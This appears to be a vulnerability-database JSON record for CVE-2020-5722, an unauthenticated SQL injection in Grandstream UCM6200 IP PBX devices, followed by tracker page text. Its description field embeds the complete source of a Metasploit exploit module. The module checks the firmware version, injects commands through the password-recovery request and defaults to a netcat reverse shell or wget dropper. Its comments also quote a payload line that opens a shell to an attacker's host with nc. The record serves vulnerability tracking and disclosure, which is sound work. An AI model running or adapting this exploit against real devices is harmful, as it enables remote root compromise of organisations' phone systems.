            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-23201",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1337",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-5722",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  prepend Msf::Exploit::Remote::AutoCheck\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n          a command injection vulnerability (technically, no assigned CVE but was inadvertently\n          patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n          series of devices. \n\n          Exploitation happens in two stages:\n\n          1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n          2. A command injection that occurs after the user provided username is passed to a Python script\n          via the shell. Like so:\n\n          /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n          password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n          This module affect UCM62xx versions before firmware version 1.0.19.20. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e [\n          \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e [\n          [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n          [ \u0027EDB\u0027, \u002748247\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027DisableNops\u0027 =\u003e true,\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 1,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 8089,\n          \u0027SSL\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n        }\n      )\n    )\n    register_options([\n      OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n    ])\n  end\n\n  ##\n  # Sends a POST /cgi request with a payload of action=getInfo. The\n  # server should respond with a large json blob like the following,\n  # where \"prog_version\" is he firmware version:\n  #\n  # {\"response\"=\u003e{\n  #   \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n  #   \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n  #   \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.\",\n  #    \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n  #    \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n  #    \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n  #    \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n  ###\n  def check\n    normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n    vprint_status(\"Requesting version information from #{normalized_uri}\")\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalized_uri,\n      \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n    })\n\n    return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n    body_json = res.get_json_document\n    return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n    prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n    return false if prog_version.nil?\n\n    vprint_status(\"The reported version is: #{prog_version}\")\n\n    version = Rex::Version.new(prog_version)\n    if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n      return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n    end\n\n    return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n  end\n\n  ##\n  # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n  # and then it will get passed to a python script via sh which allows us to execute a command injection. \n  # It will look something like this:\n  #\n  # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n  #     password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n  #\n  # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n  # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n  # payloads are appropriate. \n  ###\n  def execute_command(cmd, _opts = {})\n    rand_num = Rex::Text.rand_text_numeric(1..5)\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n      \u0027vars_post\u0027 =\u003e\n      {\n        \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n        \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n      }\n    }, 5)\n\n    # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n    # as a success. The meterpreter payload does not hold the connection open so this clause digs\n    # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n    # generates an error (e.g. rate limit error)\n    if res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n      body_json = res.get_json_document\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n      status_json = body_json[\u0027status\u0027]\n      fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n      fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager\n    end\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5722",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "156876",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165708",
        "trust": 1.8
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-15",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190",
        "trust": 0.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "48247",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "id": "VAR-202003-1435",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      }
    ]
  },
  "last_update_date": "2024-01-18T22:55:19.159000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.grandstream.com/"
      },
      {
        "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/214293"
      },
      {
        "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112779"
      },
      {
        "title": "Known Exploited Vulnerabilities Detector",
        "trust": 0.1,
        "url": "https://github.com/ostorlab/kev "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.7,
        "url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/research/tra-2020-15"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
      },
      {
        "trust": 0.7,
        "url": "https://www.exploit-db.com/exploits/48247"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/89.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
      },
      {
        "trust": 0.1,
        "url": "http://www.grandstream.com/\","
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "date": "2020-03-23T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "date": "2020-04-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "date": "2022-01-25T16:34:16",
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "date": "2020-03-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "date": "2020-03-23T20:15:12.043000",
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-23201"
      },
      {
        "date": "2022-02-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5722"
      },
      {
        "date": "2020-04-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      },
      {
        "date": "2022-01-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      },
      {
        "date": "2022-02-10T07:31:15.567000",
        "db": "NVD",
        "id": "CVE-2020-5722"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003190"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1337"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2020-5722 (GCVE-0-2020-5722)

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

Timestamps

Scope

Evidence

Vendor Report Successful Exploitation Confidence: 80% Source: cisa-kev

Details

References

GSD-2020-5722

GHSA-CGGP-723H-VG48

CNVD-2020-23201

FKIE_CVE-2020-5722

VAR-202003-1435

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

Tags

Sightings

Nomenclature